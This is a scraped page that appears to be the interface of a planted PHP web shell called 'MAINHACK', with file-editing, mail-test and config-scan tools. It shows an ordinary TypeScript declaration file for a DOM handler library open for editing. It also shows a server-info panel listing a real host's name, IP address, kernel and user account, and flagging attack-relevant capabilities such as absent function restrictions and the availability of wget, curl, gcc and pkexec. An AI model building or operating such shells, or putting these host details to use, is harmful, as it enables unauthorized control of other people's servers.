[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: index.d.ts
import { Node, Element, DataNode } from "./node"; export * from "./node"; export interface DomHandlerOptions { /** * Add a `startIndex` property to nodes. * When the parser is used in a non-streaming fashion, `startIndex` is an integer * indicating the position of the start of the node in the document. * * @default false */ withStartIndices?: boolean; /** * Add an `endIndex` property to nodes. * When the parser is used in a non-streaming fashion, `endIndex` is an integer * indicating the position of the end of the node in the document. * * @default false */ withEndIndices?: boolean; /** * Replace all whitespace with single spaces. * * **Note:** Enabling this might break your markup. * * @default false * @deprecated */ normalizeWhitespace?: boolean; } interface ParserInterface { startIndex: number | null; endIndex: number | null; } declare type Callback = (error: Error | null, dom: Node[]) => void; declare type ElementCallback = (element: Element) => void; export declare class DomHandler { /** The constructed DOM */ dom: Node[]; /** Called once parsing has completed. */ private readonly _callback; /** Settings for the handler. */ private readonly _options; /** Callback whenever a tag is closed. */ private readonly _elementCB; /** Indicated whether parsing has been completed. */ private _done; /** Stack of open tags. */ private _tagStack; /** A data node that is still being written to. */ private _lastNode; /** Reference to the parser instance. Used for location information. */ private _parser; /** * @param callback Called once parsing has completed. * @param options Settings for the handler. * @param elementCB Callback whenever a tag is closed. */ constructor(callback?: Callback | null, options?: DomHandlerOptions | null, elementCB?: ElementCallback); onparserinit(parser: ParserInterface): void; onreset(): void; onend(): void; onerror(error: Error): void; onclosetag(): void; onopentag(name: string, attribs: { [key: string]: string; }): void; ontext(data: string): void; oncomment(data: string): void; oncommentend(): void; oncdatastart(): void; oncdataend(): void; onprocessinginstruction(name: string, data: string): void; protected handleCallback(error: Error | null): void; protected addNode(node: Node): void; protected addDataNode(node: DataNode): void; } export default DomHandler; //# sourceMappingURL=index.d.ts.map
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.45 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002